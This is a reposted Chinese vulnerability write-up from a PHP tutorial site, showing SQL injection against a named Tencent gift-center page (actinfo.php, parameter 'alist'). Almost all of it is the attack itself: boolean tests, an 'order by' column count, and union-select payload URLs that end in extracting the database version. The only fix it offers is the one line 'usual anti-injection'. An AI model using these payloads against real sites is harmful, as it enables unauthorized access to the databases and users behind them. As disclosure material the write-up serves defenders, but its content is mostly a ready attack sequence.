来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] http://igame.qq.com/giftcenter/actinfo.php?type=allrd=0.12860660045407712op=actidlistviewalist=987 and 1=1正常http://igame.qq.com/giftcenter/actinfo.php?type=allrd=0.12860660045407712op=act......
|
http://igame.qq.com/giftcenter/actinfo.php?type=all&rd=0.12860660045407712&op=actidlistview&alist=987 and 1=1
正常
 http://igame.qq.com/giftcenter/actinfo.php?type=all&rd=0.12860660045407712&op=actidlistview&alist=987 and 1=2
 order by 13的时候正常了说明13个字段,继续union,但是发现and 1=1的时候完全正常
http://igame.qq.com/giftcenter/actinfo.php?type=all&rd=0.12860660045407712&op=actidlistview&alist=987%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13
and 1=2的时候失败鸟,为神马捏,初步分析是里面含有隐含的逻辑,注射成功但是由于业务逻辑无法在前台显示,可以这么试试
http://igame.qq.com/giftcenter/actinfo.php?type=all&rd=0.12860660045407712&op=actidlistview&alist=987 and 1=2 union select 987,987,987,987,987,987,987,987,987,987,987,987,987
这下成功了,然后再看看哪个字段是要被逻辑用到的吧
http://igame.qq.com/giftcenter/actinfo.php?type=all&rd=0.12860660045407712&op=actidlistview&alist=987%20and%201=2%20union%20select%201,1,1,987,1,1,version%28%29,987,987,987,987,987,1
这样就可以了嘛,用这个字段显示就可以
 修复方案:
通常的防注入
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
